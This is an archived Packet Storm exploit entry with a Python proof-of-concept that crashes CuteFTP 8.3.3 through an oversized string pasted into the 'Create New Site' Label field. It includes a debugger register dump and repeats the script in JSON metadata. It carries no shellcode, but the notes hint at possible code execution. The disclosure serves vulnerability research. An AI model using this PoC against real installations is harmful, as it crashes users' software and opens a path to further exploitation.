ID PACKETSTORM:81663 Type packetstorm Reporter Dr_IDE Modified 2009-09-26T00:00:00
Description
`#!/usr/bin/env python
#####################################################################################################
#
# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC
# Found By: Dr_IDE
# Download: http://www.cuteftp.com/downloads/
# Tested On: Windows 7 RC, XP might be more shell friendly
# Notes: This PoC exploits the "Create New Site" mechanism. Any site type that you pick will work.
# Because of differences in the internal process of each site type you may be able to get
# execution through one of these channels.
#
#####################################################################################################
"""
EAX 02120000
ECX 0228BA90 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 41414141
EBX 00004141
ESP 0018C160
EBP 0018C230
ESI 0228BA88
EDI 41414141
EIP 77843913 ntdll.77843913
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit 7EFDD000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0 LastErr ERROR_SUCCESS (00000000)
EFL 00010212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty -??? FFFF 000000FF 00FF00FF
ST1 empty -??? FFFF 00000000 00008200
ST2 empty -??? FFFF 00010000 00010000
ST3 empty 431.99999034404754640
ST4 empty 1.0000000000000000000
ST5 empty 1.0000000000000000000
ST6 empty 16.000000000000000000
ST7 empty 16.000000000000000000
3 2 1 0 E S P U O Z D I
FST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
"""
buff = ("\x41" * 20000)
try:
f1 = open("CuteFTP.txt","w");
f1.write(buff);
f1.close();
print "\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC"
print "By: Dr_IDE"
print "\nFile Created Successfully.\n"
print "Usage:\n [-] Click File\n [-] Create New FTP Site\n [-] Paste String into Label Field\n [-] Enter anything for Address\n [-] Click Connect\n [-] Boom."
except:
print "[-] Error. File couldn't be created."`
{"hash": "30dd0b31bcd748c9b9fe115bbb98190c727cd89d21b87529737994d29c0dd59b", "sourceHref": "https://packetstormsecurity.com/files/download/81663/Dr_IDE-CuteFTP_FTP_8.3.3-PoC.py.txt", "title": "CuteFTP 8.3.3 Buffer Overflow", "id": "PACKETSTORM:81663", "published": "2009-09-26T00:00:00", "description": "", "modified": "2009-09-26T00:00:00", "sourceData": "`#!/usr/bin/env python \n \n##################################################################################################### \n# \n# CuteFTP v8.3.3 Home/Pro/Lite Create New Site Local Buffer Overflow PoC \n# Found By: Dr_IDE \n# Download: http://www.cuteftp.com/downloads/ \n# Tested On: Windows 7 RC, XP might be more shell friendly \n# Notes: This PoC exploits the \"Create New Site\" mechanism. Any site type that you pick will work. \n# Because of differences in the internal process of each site type you may be able to get \n# execution through one of these channels. \n# \n##################################################################################################### \n \n\"\"\" \nEAX 02120000 \nECX 0228BA90 ASCII \"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nEDX 41414141 \nEBX 00004141 \nESP 0018C160 \nEBP 0018C230 \nESI 0228BA88 \nEDI 41414141 \nEIP 77843913 ntdll.77843913 \nC 0 ES 002B 32bit 0(FFFFFFFF) \nP 0 CS 0023 32bit 0(FFFFFFFF) \nA 1 SS 002B 32bit 0(FFFFFFFF) \nZ 0 DS 002B 32bit 0(FFFFFFFF) \nS 0 FS 0053 32bit 7EFDD000(FFF) \nT 0 GS 002B 32bit 0(FFFFFFFF) \nD 0 \nO 0 LastErr ERROR_SUCCESS (00000000) \nEFL 00010212 (NO,NB,NE,A,NS,PO,GE,G) \nST0 empty -??? FFFF 000000FF 00FF00FF \nST1 empty -??? FFFF 00000000 00008200 \nST2 empty -??? FFFF 00010000 00010000 \nST3 empty 431.99999034404754640 \nST4 empty 1.0000000000000000000 \nST5 empty 1.0000000000000000000 \nST6 empty 16.000000000000000000 \nST7 empty 16.000000000000000000 \n3 2 1 0 E S P U O Z D I \nFST 4020 Cond 1 0 0 0 Err 0 0 1 0 0 0 0 0 (EQ) \nFCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1 \n \n\"\"\" \n \nbuff = (\"\\x41\" * 20000) \n \ntry: \nf1 = open(\"CuteFTP.txt\",\"w\"); \nf1.write(buff); \nf1.close(); \n \nprint \"\\nCuteFTP v8.3.2 Home/Pro/Lite Create New Site Local Buffer Overflow PoC\" \nprint \"By: Dr_IDE\" \nprint \"\\nFile Created Successfully.\\n\" \nprint \"Usage:\\n [-] Click File\\n [-] Create New FTP Site\\n [-] Paste String into Label Field\\n [-] Enter anything for Address\\n [-] Click Connect\\n [-] Boom.\" \nexcept: \nprint \"[-] Error. File couldn't be created.\"`\n", "reporter": "Dr_IDE", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "59c2697edec13f988f86d42522a78d88"}, {"key": "modified", "hash": "6cd4ae2f205d2768ce79e832bc7d6c29"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "6cd4ae2f205d2768ce79e832bc7d6c29"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "4385384597b3adc5c7bfb5872411d1a2"}, {"key": "sourceData", "hash": "c5284d04e867369a3a5d88b7d1cc8ed1"}, {"key": "sourceHref", "hash": "c5f5a90cd821fd6e6a27df430fd68ff6"}, {"key": "title", "hash": "5f50a79c350857977b1ebf56ee2964a6"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/81663/CuteFTP-8.3.3-Buffer-Overflow.html", "lastseen": "2016-11-03T10:22:38", "viewCount": 0, "enchantments": {"vulnersScore": 4.0}}